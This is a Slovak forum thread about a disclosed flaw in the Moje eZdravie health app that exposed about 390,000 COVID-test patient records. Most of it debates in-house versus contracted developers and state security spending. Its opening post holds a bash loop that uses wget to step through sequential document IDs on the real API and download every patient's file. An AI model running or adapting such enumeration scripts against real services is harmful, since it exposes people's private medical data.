Kritická zraniteľnosť v aplikácii Moje eZdravie - únik databázy pacientov

#!/bin/bash
for (( i=8966; i < 391000; i++ )); do 
wget https://mojeezdravie.nczisk.sk/api/cntnt.dnld.php/$i
done

:man_facepalming:

3 Likes

To musel programovať fakt sedlák čo nevie nič o bezpečnosti.

Vzhľadom na 390K záznamov a údaje ako RČ, príznaky a výsledok testu je toto zrejme najväčšia verejne známa zraniteľnosť v eGov systémoch za dlhšiu dobu.

Ináč kudos za responsible disclosure Nethemba.

3 Likes

Toto robili v NCZI inhouse asi tak 3ja ľudia (AFAIK).

tak mame diskusny prispevok k vyhodam inhouse programatorov

1 Like

Nuž videl som už bohužiaľ dosť “komerčných programátorov”, ktorí to robia presne takto.

1 Like

Cakal som kedy pride tato svata vojna aj tu. Napriklad by bolo zaujimave sa pozriet ake su platy a podmienky prace tychto internych programatorov a potom porovnat ich vykony s podobne zaplatenymi ludmi v komercii.

to asi ano, ale pri vybere dodavatela mas poziadavky na interne procedury, certifikaty atd. a este mozes ziadat pokuty ak by taketo nieco spravil. lacneho dodavatela bez takychto predpokladov neupustis k zdravotnym informaciam, len k skladovym kartam:)

1 Like

Inak, ti ludia mali tiez popri tomto ich “beznu” pracu, akoze full-time ine projekty na ktorych museli robit (vramci NCZI) a da sa povedat ze Moje eZdravie kodili proste navyse, kvoli tomu ze to kvoli koronavirusu bolo treba. (Aspon takto vysvetlovali ten vznik toho).

Toto ma vobec neukludnilo, skor naopak.

JE to jednoduche ako v sukromenj firme, kedy si firma programuje internymi programatormi (kolko ich jhe ochotna dlhodobo zivit, nebavime sa o IT firmach) a kedy si to kupuje od externych firiem. Paltiti maju tie iste pravidla (ci je to banka, stavebna firma, nemocnica, statny urad alebo hocico ine), potrebujes aj jedno aj druhe (profesionalnejsie musia byt specilizovane firmy ktore sa tmyto zivia. Aj dom si mozes postavit sa , svojpomocne aklebo to das postavit profesionalnej stavebnej firme.

1 Like

Nechcel som ani ukludnovat, iba informovat a zasadit veci do kontextu (ze ake az zle to je).

Tu je zaujimave, ze napriek tomu, ze mame extremne vela regulacii na statne IT systemy, tak toto ocividne nevidel ziadny securitak. Toto je tak trivialny utok, ze hocikto, kto mal jednu prednasku bezpecnosti, to nemohol takto s kludnym svedomim nechat.

Na rok 2017 malo NCZI 17M€ rozpočet.

Špecificky vtedy tiež minuli cca 1M€ na “zvýšenie bezpečnosti”. :thinking:

Výročné správy tu dole: http://www.nczisk.sk/O-nas/Dokumenty/Pages/default.aspx

1 Like

“Pavol Lupták, etický hacker a IT bezpečnostný špecialista z firmy Nethemba, ktorá odhalila kritickú zraniteľnosť v dátach testovaných PACIENTOV na COVID-19, rozpráva o zabezpečení dát.” Facebook .týždeň

Mal som tu cest nejake 2 roky v NCZI riesit jeden projekt. Bezpecaci (ci uz interni ale najma externi z Lynxu) tam boli pani bohovia bez ktorych sa nedalo ani len prdnut. Aj systemy, ktore okolo pacientskych dat (ktore mali byt kryptovane a zabezpecene po celej ceste) ani len nesli a boli len podporne podliehali az paranoidnej “bezpecnosti”. Zo srandy(?) sa hovorilo, ze kazdy firewall musi byt zabezpeceny inym firewallom. Takze toto je mega FAIL…

ano, to je. Ale nie je mi jasne ako to vobec mohlo systemovo vzniknut. To koli korone zrusili akekolvek pravidla ? A znamena to ze sa bezny programator vedel dostat k zdravotnej dokumentacii ? Alebo to vzniklo uplne mimo pretoze bola poziadavka zadarmo a rychlo ? A nikto pricetny nepovedal ze NIE ?
Toto je tak mega pruser ze obnovit doveru v stat bude trvat dlho.

Hej, podla mna to vzniklo na rychlo a pomimo zbytku systemu. Cely eHealth lezie cez kopec vselijakych bezpecnostnych prvkov, kadejakych transformacii, Microsoft infrastruktury (aby to vo finale robilo glorifikovany CRUD s WS front-endom). Toto vyzera ako vystrel od boku…
Zhora prisiel prikaz, ze nieco rychlo potrebujeme, niekto mozno aj v dobrej viere rychlo nieco spachal. A takto to dopadlo.

Suhlasim, ale zaroven v clanku na Denniku N sa explicitne spomina ze ten “Moje eZdravie” projekt bol planovany uz pred pandemiou (neviem ci to znamena ze aj vyvoj zacal uz predtym, ale nejake struktury a plany tam uz teda museli byt):

„Jej spustenie pre občanov bolo naplánované aj pred vypuknutím pandémie. NCZI vzhľadom na situáciu urýchlilo jej vývoj,“

Tomu tazko uverit vzhladom na paranoickost bezpecnosti, ktora v tej organizacii vladna/vladla. Okrem uplnych trivialit zasahy do produkcnych systemov riesili len ludia z Lynx a aj tie museli byt schvalene od NCZI.